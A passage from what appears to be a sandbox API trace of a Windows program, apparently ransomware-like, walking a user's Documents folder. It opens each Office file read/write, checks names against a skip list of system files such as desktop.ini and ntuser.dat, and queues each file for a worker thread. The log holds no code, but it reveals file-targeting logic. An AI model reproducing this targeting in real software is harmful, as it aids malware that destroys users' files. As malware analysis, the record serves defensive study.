HALPmcxz\\Documents\\0tm45Vd-10FUKtTqfmOc.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0tm45vd-10fukttqfmoc.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x840 [0076.001] StrStrW (lpFirst="0tm45vd-10fukttqfmoc.docx", lpSrch="read_me.txt") returned 0x0 [0076.001] StrStrW (lpFirst="0tm45vd-10fukttqfmoc.docx", lpSrch="autoexec.bat") returned 0x0 [0076.001] StrStrW (lpFirst="0tm45vd-10fukttqfmoc.docx", lpSrch="desktop.ini") returned 0x0 [0076.001] StrStrW (lpFirst="0tm45vd-10fukttqfmoc.docx", lpSrch="autorun.inf") returned 0x0 [0076.001] StrStrW (lpFirst="0tm45vd-10fukttqfmoc.docx", lpSrch="ntuser.dat") returned 0x0 [0076.002] StrStrW (lpFirst="0tm45vd-10fukttqfmoc.docx", lpSrch="iconcache.db") returned 0x0 [0076.002] StrStrW (lpFirst="0tm45vd-10fukttqfmoc.docx", lpSrch="bootsect.bak") returned 0x0 [0076.002] StrStrW (lpFirst="0tm45vd-10fukttqfmoc.docx", lpSrch="boot.ini") returned 0x0 [0076.002] StrStrW (lpFirst="0tm45vd-10fukttqfmoc.docx", lpSrch="ntuser.dat.log") returned 0x0 [0076.002] StrStrW (lpFirst="0tm45vd-10fukttqfmoc.docx", lpSrch="thumbs.db") returned 0x0 [0076.002] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 49 [0076.002] QueueUserWorkItem (Function=0x404e00, Context=0x840, Flags=0x0) returned 1 [0076.002] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51a0cc80, ftCreationTime.dwHighDateTime=0x1d53758, ftLastAccessTime.dwLowDateTime=0x884b5850, ftLastAccessTime.dwHighDateTime=0x1d57bf9, ftLastWriteTime.dwLowDateTime=0x884b5850, ftLastWriteTime.dwHighDateTime=0x1d57bf9, nFileSizeHigh=0x0, nFileSizeLow=0xc461, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="3ZF0vW0u2.xlsx", cAlternateFileName="3ZF0VW~1.XLS")) returned 1 [0076.002] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3ZF0vW0u2.xlsx") returned 58 [0076.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3ZF0vW0u2.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3zf0vw0u2.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x844 [0076.002] StrStrW (lpFirst="3zf0vw0u2.xlsx", lpSrch="read_me.txt") returned 0x0 [0076.002] StrStrW (lpFirst="3zf0vw0u2.xlsx", lpSrch="autoexec.bat") returned 0x0 [0076.002] StrStrW (lpFirst="3zf0vw0u2.xlsx", lpSrch="desktop.ini") returned 0x0 [0076.002] StrStrW (lpFirst="3zf0vw0u2.xlsx", lpSrch="autorun.inf") returned 0x0 [0076.002] StrStrW (lpFirst="3zf0vw0u2.xlsx", lpSrch="ntuser.dat") returned 0x0 [0076.002] StrStrW (lpFirst="3zf0vw0u2.xlsx", lpSrch="iconcache.db") returned 0x0 [0076.002] StrStrW (lpFirst="3zf0vw0u2.xlsx", lpSrch="bootsect.bak") returned 0x0 [0076.002] StrStrW (lpFirst="3zf0vw0u2.xlsx", lpSrch="boot.ini") returned 0x0 [0076.003] StrStrW (lpFirst="3zf0vw0u2.xlsx", lpSrch="ntuser.dat.log") returned 0x0 [0076.003] StrStrW (lpFirst="3zf0vw0u2.xlsx", lpSrch="thumbs.db") returned 0x0 [0076.003] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 50 [0076.003] QueueUserWorkItem (Function=0x404e00, Context=0x844, Flags=0x0) returned 1 [0076.003] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5817beb0, ftCreationTime.dwHighDateTime=0x1d55d47, ftLastAccessTime.dwLowDateTime=0x73f79d80, ftLastAccessTime.dwHighDateTime=0x1d56ada, ftLastWriteTime.dwLowDateTime=0x73f79d80, ftLastWriteTime.dwHighDateTime=0x1d56ada, nFileSizeHigh=0x0, nFileSizeLow=0xcc5e, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="6CT5st-Mp.xlsx", cAlternateFileName="6CT5ST~1.XLS")) returned 1 [0076.003] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6CT5st-Mp.xlsx") returned 58 [0076.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6CT5st-Mp.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6ct5st-mp.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x848 [0076.003] StrStrW (lpFirst="6ct5st-mp.xlsx", lpSrch="read_me.txt") returned 0x0 [0076.003] StrStrW (lpFirst="6ct5st-mp.xlsx", lpSrch="autoexec.bat") returned 0x0 [0076.003] StrStrW (lpFirst="6ct5st-mp.xlsx", lpSrch="desktop.ini") returned 0x0 [0076.003] StrStrW (lpFirst="6ct5st-mp.xlsx", lpSrch="autorun.inf") returned 0x0 [0076.003] StrStrW (lpFirst="6ct5st-mp.xlsx", lpSrch="ntuser.dat") returned 0x0 [0076.003] StrStrW (lpFirst="6ct5st-mp.xlsx", lpSrch="iconcache.db") returned 0x0 [0076.003] StrStrW (lpFirst="6ct5st-mp.xlsx", lpSrch="bootsect.bak") returned 0x0 [0076.003] StrStrW (lpFirst="6ct5st-mp.xlsx", lpSrch="boot.ini") returned 0x0 [0076.003] StrStrW (lpFirst="6ct5st-mp.xlsx", lpSrch="ntuser.dat.log") returned 0x0 [0076.003] StrStrW (lpFirst="6ct5st-mp.xlsx", lpSrch="thumbs.db") returned 0x0 [0076.003] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 51 [0076.003] QueueUserWorkItem (Function=0x404e00, Context=0x848, Flags=0x0) returned 1 [0076.003] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70aee290, ftCreationTime.dwHighDateTime=0x1d4d526, ftLastAccessTime.dwLowDateTime=0x247fbfc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x247fbfc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="8Bn0vYqIGbef7_rt", cAlternateFileName="8BN0VY~1")) returned 1 [0076.004] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt") returned 60 [0076.004] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x165e76d0, ftCreationTime.dwHighDateTime=0x1d52d54, ftLastAccessTime.dwLowDateTime=0x4a462490, ftLastAccessTime.dwHighDateTime=0x1d53cac, ftLastWriteTime.dwLowDateTime=0x4a462490, ftLastWriteTime.dwHighDateTime=0x1d53cac, nFileSizeHigh=0x0, nFileSizeLow=0xdae5, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="9Z3cqEnbV.pptx", cAlternateFileName="9Z3CQE~1.PPT")) returned 1 [0076.004] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Z3cqEnbV.pptx") returned 58 [0076.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Z3cqEnbV.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9z3cqenbv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84c [0076.004] StrStrW (lpFirst="9z3cqenbv.pptx", lpSrch="read_me.txt") returned 0x0 [0076.004] StrStrW (lpFirst="9z3cqenbv.pptx", lpSrch="autoexec.bat") returned 0x0 [0076.004] StrStrW (lpFirst="9z3cqenbv.pptx", lpSrch="desktop.ini") returned 0x0 [0076.004] StrStrW (lpFirst="9z3cqenbv.pptx", lpSrch="autorun.inf") returned 0x0 [0076.004] StrStrW (lpFirst="9z3cqenbv.pptx", lpSrch="ntuser.dat") returned 0x0 [0076.004] StrStrW (lpFirst="9z3cqenbv.pptx", lpSrch="iconcache.db") returned 0x0 [0076.004] StrStrW (lpFirst="9z3cqenbv.pptx", lpSrch="bootsect.bak") returned 0x0 [0076.004] StrStrW (lpFirst="9z3cqenbv.pptx", lpSrch="boot.ini") returned 0x0 [0076.004] StrStrW (lpFirst="9z3cqenbv.pptx", lpSrch="ntuser.dat.log") returned 0x0 [0076.004] StrStrW (lpFirst="9z3cqenbv.pptx", lpSrch="thumbs.db") returned 0x0 [0076.004] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 52 [0076.004] QueueUserWorkItem (Function=0x404e00, Context=0x84c, Flags=0x0) returned 1 [0076.004] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe398800, ftCreationTime.dwHighDateTime=0x1d55b8f, ftLastAccessTime.dwLowDateTime=0x7facb470, ftLastAccessTime.dwHighDateTime=0x1d53dfe, ftLastWriteTime.dwLowDateTime=0x7facb470, ftLastWriteTime.dwHighDateTime=0x1d53dfe, nFileSizeHigh=0x0, nFileSizeLow=0x15907, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bExrSPFkXu33TXCdhRjV.xlsx", cAlternateFileName="BEXRSP~1.XLS")) returned 1 [0076.004] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bExrSPFkXu33TXCdhRjV.xlsx") returned 69 [0076.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bExrSPFkXu33TXCdhRjV.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bexrspfkxu33txcdhrjv.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x850 [0076.005] StrStrW (lpFirst="bexrspfkxu33txcdhrjv.xlsx", lpSrch="read_me.txt") returned 0x0 [0076.005] StrStrW (lpFirst="bexrspfkxu33txcdhrjv.xlsx", lpSrch="autoexec.bat") returned 0x0 [0076.005] StrStrW (lpFirst="bexrspfkxu33txcdhrjv.xlsx", lpSrch="desktop.ini") returned 0x0 [0076.005] StrStrW (lpFirst="bexrspfkxu33txcdhrjv.xlsx", lpSrch="autorun.inf") returned 0x0 [0076.005] StrStrW (lpFirst="bexrspfkxu33txcdhrjv.xlsx", lpSrch="ntuser.dat") returned 0x0 [0076.005] StrStrW (lpFirst="bexrspfkxu33txcdhrjv.xlsx", lpSrch="iconcache.db") returned 0x0 [0076.005] StrStrW (lpFirst="bexrspfkxu33txcdhrjv.xlsx", lpSrch="bootsect.bak") returned 0x0 [0076.005] StrStrW (lpFirst="bexrspfkxu33txcdhrjv.xlsx", lpSrch="boot.ini") returned 0x0 [0076.005] StrStrW (lpFirst="bexrspfkxu33txcdhrjv.xlsx", lpSrch="ntuser.dat.log") returned 0x0 [0076.005] StrStrW (lpFirst="bexrspfkxu33txcdhrjv.xlsx", lpSrch="thumbs.db") returned 0x0 [0076.005] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 53 [0076.005] QueueUserWorkItem (Function=0x404e00, Context=0x850, Flags=0x0) returned 1 [0076.005] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.005] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0076.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x854 [0076.005] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0076.005] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0076.005] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0076.005] CloseHandle (hObject=0x854) returned 1 [0076.006] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9462c700, ftCreationTime.dwHighDateTime=0x1d5482c, ftLastAccessTime.dwLowDateTime=0xe58edc30, ftLastAccessTime.dwHighDateTime=0x1d563d0, ftLastWriteTime.dwLowDateTime=0xe58edc30, ftLastWriteTime.dwHighDateTime=0x1d563d0, nFileSizeHigh=0x0, nFileSizeLow=0x1286a, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="GP5bcTy5x8.docx", cAlternateFileName="GP5BCT~1.DOC")) returned 1 [0076.006] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GP5bcTy5x8.docx") returned 59 [0076.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GP5bcTy5x8.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gp5bcty5x8.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x854 [0076.006] StrStrW (lpFirst="gp5bcty5x8.docx", lpSrch="read_me.txt") returned 0x0 [0076.006] StrStrW (lpFirst="gp5bcty5x8.docx", lpSrch="autoexec.bat") returned 0x0 [0076.006] StrStrW (lpFirst="gp5bcty5x8.docx", lpSrch="desktop.ini") returned 0x0 [0076.006] StrStrW (lpFirst="gp5bcty5x8.docx", lpSrch="autorun.inf") returned 0x0 [0076.006] StrStrW (lpFirst="gp5bcty5x8.docx", lpSrch="ntuser.dat") returned 0x0 [0076.006] StrStrW (lpFirst="gp5bcty5x8.docx", lpSrch="iconcache.db") returned 0x0 [0076.006] StrStrW (lpFirst="gp5bcty5x8.docx", lpSrch="bootsect.bak") returned 0x0 [0076.006] StrStrW (lpFirst="gp5bcty5x8.docx", lpSrch="boot.ini") returned 0x0 [0076.006] StrStrW (lpFirst="gp5bcty5x8.docx", lpSrch="ntuser.dat.log") returned 0x0 [0076.006] StrStrW (lpFirst="gp5bcty5x8.docx", lpSrch="thumbs.db") returned 0x0 [0076.006] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 54 [0076.006] QueueUserWorkItem (Function=0x404e00, Context=0x854, Flags=0x0) returned 1 [0076.006] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e03cd30, ftCreationTime.dwHighDateTime=0x1d55cd5, ftLastAccessTime.dwLowDateTime=0x27304e00, ftLastAccessTime.dwHighDateTime=0x1d53d9b, ftLastWriteTime.dwLowDateTime=0x27304e00, ftLastWriteTime.dwHighDateTime=0x1d53d9b, nFileSizeHigh=0x0, nFileSizeLow=0xae55, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="hMQmO8YBLr.xlsx", cAlternateFileName="HMQMO8~1.XLS")) returned 1 [0076.006] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hMQmO8YBLr.xlsx") returned 59 [0076.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hMQmO8YBLr.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hmqmo8yblr.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x858 [0076.007] StrStrW (lpFirst="hmqmo8yblr.xlsx", lpSrch="read_me.txt") returned 0x0 [0076.007] StrStrW (lpFirst="hmqmo8yblr.xlsx", lpSrch="autoexec.bat") returned 0x0 [0076.007] StrStrW (lpFirst="hmqmo8yblr.xlsx", lpSrch="desktop.ini") returned 0x0 [0076.007] StrStrW (lpFirst="hmqmo8yblr.xlsx", lpSrch="autorun.inf") returned 0x0 [0076.007] StrStrW (lpFirst="hmqmo8yblr.xlsx", lpSrch="ntuser.dat") returned 0x0 [0076.007] StrStrW (lpFirst="hmqmo8yblr.xlsx", lpSrch="iconcache.db") returned 0x0 [0076.007] StrStrW (lpFirst="hmqmo8yblr.xlsx", lpSrch="bootsect.bak") returned 0x0 [0076.007] StrStrW (lpFirst="hmqmo8yblr.xlsx", lpSrch="boot.ini") returned 0x0 [0076.007] StrStrW (lpFirst="hmqmo8yblr.xlsx", lpSrch="ntuser.dat.log") returned 0x0 [0076.007] StrStrW (lpFirst="hmqmo8yblr.xlsx", lpSrch="thumbs.db") returned 0x0 [0076.007] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 55 [0076.007] QueueUserWorkItem (Function=0x404e00, Context=0x858, Flags=0x0) returned 1 [0076.007] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0076.007] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned 52 [0076.007] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0076.007] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned 55 [0076.007] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0076.007] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned 53 [0076.007] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0076.007] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned 53 [0076.007] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21a18e60, ftCreationTime.dwHighDateTime=0x1d54fd2, ftLastAccessTime.dwLowDateTime=0xe2254cd0, ftLastAccessTime.dwHighDateTime=0x1d5179c, ftLastWriteTime.dwLowDateTime=0xe2254cd0, ftLastWriteTime.dwHighDateTime=0x1d5179c, nFileSizeHigh=0x0, nFileSizeLow=0x17dbc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n9o52Fm.pptx", cAlternateFileName="N9O52F~1.PPT")) returned 1 [0076.007] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n9o52Fm.pptx") returned 56 [0076.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n9o52Fm.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n9o52fm.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x85c [0076.007] StrStrW (lpFirst="n9o52fm.pptx", lpSrch="read_me.txt") returned 0x0 [0076.007] StrStrW (lpFirst="n9o52fm.pptx", lpSrch="autoexec.bat") returned 0x0 [0076.008] StrStrW (lpFirst="n9o52fm.pptx", lpSrch="desktop.ini") returned 0x0 [0076.008] StrStrW (lpFirst="n9o52fm.pptx", lpSrch="autorun.inf") returned 0x0 [0076.008] StrStrW (lpFirst="n9o52fm.pptx", lpSrch="ntuser.dat") returned 0x0 [0076.008] StrStrW (lpFirst="n9o52fm.pptx", lpSrch="iconcache.db") returned 0x0 [0076.008] StrStrW (lpFirst="n9o52fm.pptx", lpSrch="bootsect.bak") returned 0x0 [0076.008] StrStrW (lpFirst="n9o52fm.pptx", lpSrch="boot.ini") returned 0x0 [0076.008] StrStrW (lpFirst="n9o52fm.pptx", lpSrch="ntuser.dat.log") returned 0x0 [0076.008] StrStrW (lpFirst="n9o52fm.pptx", lpSrch="thumbs.db") returned 0x0 [0076.008] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 56 [0076.008] QueueUserWorkItem (Function=0x404e00, Context=0x85c, Flags=0x0) returned 1 [0076.008] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0076.008] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned 57 [0076.008] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8155ffb0, ftCreationTime.dwHighDateTime=0x1d599a8, ftLastAccessTime.dwLowDateTime=0xa5f5bbe0, ftLastAccessTime.dwHighDateTime=0x1d53eb7, ftLastWriteTime.dwLowDateTime=0xa5f5bbe0, ftLastWriteTime.dwHighDateTime=0x1d53eb7, nFileSizeHigh=0x0, nFileSizeLow=0x1999, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q6BY.pptx", cAlternateFileName="Q6BY~1.PPT")) returned 1 [0076.008] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\q6BY.pptx") returned 53 [0076.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\q6BY.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\q6by.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x860 [0076.008] StrStrW (lpFirst="q6by.pptx", lpSrch="read_me.txt") returned 0x0 [0076.008] StrStrW (lpFirst="q6by.pptx", lpSrch="autoexec.bat") returned 0x0 [0076.008] StrStrW (lpFirst="q6by.pptx", lpSrch="desktop.ini") returned 0x0 [0076.008] StrStrW (lpFirst="q6by.pptx", lpSrch="autorun.inf") returned 0x0 [0076.009] StrStrW (lpFirst="q6by.pptx", lpSrch="ntuser.dat") returned 0x0 [0076.009] StrStrW (lpFirst="q6by.pptx", lpSrch="iconcache.db") returned 0x0 [0076.009] StrStrW (lpFirst="q6by.pptx", lpSrch="bootsect.bak") returned 0x0 [0076.009] StrStrW (lpFirst="q6by.pptx", lpSrch="boot.ini") returned 0x0 [0076.009] StrStrW (lpFirst="q6by.pptx", lpSrch="ntuser.dat.log") returned 0x0 [0076.009] StrStrW (lpFirst="q6by.pptx", lpSrch="thumbs.db") returned 0x0 [0076.009] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 57 [0076.009] QueueUserWorkItem (Function=0x404e00, Context=0x860, Flags=0x0) returned 1 [0076.009] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f7e4e70, ftCreationTime.dwHighDateTime=0x1d52a97, ftLastAccessTime.dwLowDateTime=0xf6f790, ftLastAccessTime.dwHighDateTime=0x1d538bc, ftLastWriteTime.dwLowDateTime=0xf6f790, ftLastWriteTime.dwHighDateTime=0x1d538bc, nFileSizeHigh=0x0, nFileSizeLow=0x14053, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QwIqKQSVxE 5799zU.docx", 